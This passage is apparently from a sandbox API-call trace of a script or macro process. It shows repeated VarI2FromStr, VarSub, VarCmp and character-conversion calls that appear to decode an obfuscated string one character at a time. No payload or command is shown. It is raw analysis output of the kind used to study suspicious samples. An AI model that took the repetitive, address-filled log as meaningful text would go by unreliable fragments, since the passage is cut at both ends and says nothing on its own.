lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="z") returned 1 [0175.222] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.222] malloc (_Size=0xa0) returned 0x11f50080 [0175.222] free (_Block=0x11f50080) [0175.223] VarI2FromStr (in: strIn="&Hc5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.223] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0175.223] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.223] malloc (_Size=0xa0) returned 0x11f50080 [0175.223] free (_Block=0x11f50080) [0175.223] VarI2FromStr (in: strIn="&Hda", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.223] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0175.223] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.223] malloc (_Size=0xa0) returned 0x11f50080 [0175.223] free (_Block=0x11f50080) [0175.223] VarI2FromStr (in: strIn="&Hd1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.223] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0175.224] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.224] malloc (_Size=0xa0) returned 0x11f50080 [0175.224] free (_Block=0x11f50080) [0175.224] VarI2FromStr (in: strIn="&Hb8", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.224] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="j") returned 1 [0175.224] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.224] malloc (_Size=0xa0) returned 0x11f50080 [0175.224] free (_Block=0x11f50080) [0175.224] VarI2FromStr (in: strIn="&Hd2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.224] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0175.224] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.224] malloc (_Size=0xa0) returned 0x11f50080 [0175.225] free (_Block=0x11f50080) [0175.225] VarI2FromStr (in: strIn="&Haf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.225] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.225] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.225] malloc (_Size=0xa0) returned 0x11f50080 [0175.225] free (_Block=0x11f50080) [0175.225] VarI2FromStr (in: strIn="&Hcc", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.225] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0175.225] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.225] malloc (_Size=0xa0) returned 0x11f50080 [0175.225] free (_Block=0x11f50080) [0175.225] VarI2FromStr (in: strIn="&H95", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.225] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0175.226] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.226] malloc (_Size=0xa0) returned 0x11f50080 [0175.226] free (_Block=0x11f50080) [0175.226] VarI2FromStr (in: strIn="&Hb7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.226] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0175.226] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.226] malloc (_Size=0xa0) returned 0x11f50080 [0175.226] free (_Block=0x11f50080) [0175.226] VarI2FromStr (in: strIn="&He9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.226] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0175.226] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.226] malloc (_Size=0xa0) returned 0x11f50080 [0175.227] free (_Block=0x11f50080) [0175.227] VarI2FromStr (in: strIn="&Hbc", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.227] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0175.227] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.227] malloc (_Size=0xa0) returned 0x11f50080 [0175.227] free (_Block=0x11f50080) [0175.227] VarI2FromStr (in: strIn="&H90", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.227] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.227] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.227] malloc (_Size=0xa0) returned 0x11f50080 [0175.227] free (_Block=0x11f50080) [0175.227] VarI2FromStr (in: strIn="&Hb1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.227] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.227] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.228] malloc (_Size=0xa0) returned 0x11f50080 [0175.228] free (_Block=0x11f50080) [0175.228] VarI2FromStr (in: strIn="&Hae", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.228] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.228] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.228] malloc (_Size=0xa0) returned 0x11f50080 [0175.228] free (_Block=0x11f50080) [0175.228] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.228] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.228] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.228] malloc (_Size=0xa0) returned 0x11f50080 [0175.228] free (_Block=0x11f50080) [0175.228] VarI2FromStr (in: strIn="&H8f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.229] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.229] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.229] malloc (_Size=0xa0) returned 0x11f50080 [0175.229] free (_Block=0x11f50080) [0175.229] VarI2FromStr (in: strIn="&Hb2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.229] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.229] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.229] malloc (_Size=0xa0) returned 0x11f50080 [0175.229] free (_Block=0x11f50080) [0175.229] VarI2FromStr (in: strIn="&Haf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.229] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.230] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.230] malloc (_Size=0xa0) returned 0x11f50080 [0175.230] free (_Block=0x11f50080) [0175.230] VarI2FromStr (in: strIn="&H9b", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.230] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.230] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.230] malloc (_Size=0xa0) returned 0x11f50080 [0175.231] free (_Block=0x11f50080) [0175.231] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.231] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.231] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.231] malloc (_Size=0xa0) returned 0x11f50080 [0175.232] free (_Block=0x11f50080) [0175.232] VarI2FromStr (in: strIn="&H97", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.232] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.232] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.232] malloc (_Size=0xa0) returned 0x11f50080 [0175.232] free (_Block=0x11f50080) [0175.232] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.232] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.232] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.232] malloc (_Size=0xa0) returned 0x11f50080 [0175.232] free (_Block=0x11f50080) [0175.232] VarI2FromStr (in: strIn="&Hb0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.233] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.233] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.233] malloc (_Size=0xa0) returned 0x11f50080 [0175.233] free (_Block=0x11f50080) [0175.233] VarI2FromStr (in: strIn="&H90", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.233] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.233] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.233] malloc (_Size=0xa0) returned 0x11f50080 [0175.233] free (_Block=0x11f50080) [0175.233] VarI2FromStr (in: strIn="&Hb1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.233] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.234] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.234] malloc (_Size=0xa0) returned 0x11f50080 [0175.234] free (_Block=0x11f50080) [0175.234] VarI2FromStr (in: strIn="&Hae", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.234] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.234] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.234] malloc (_Size=0xa0) returned 0x11f50080 [0175.234] free (_Block=0x11f50080) [0175.234] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.234] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.234] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.234] malloc (_Size=0xa0) returned 0x11f50080 [0175.234] free (_Block=0x11f50080) [0175.235] VarI2FromStr (in: strIn="&H8f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 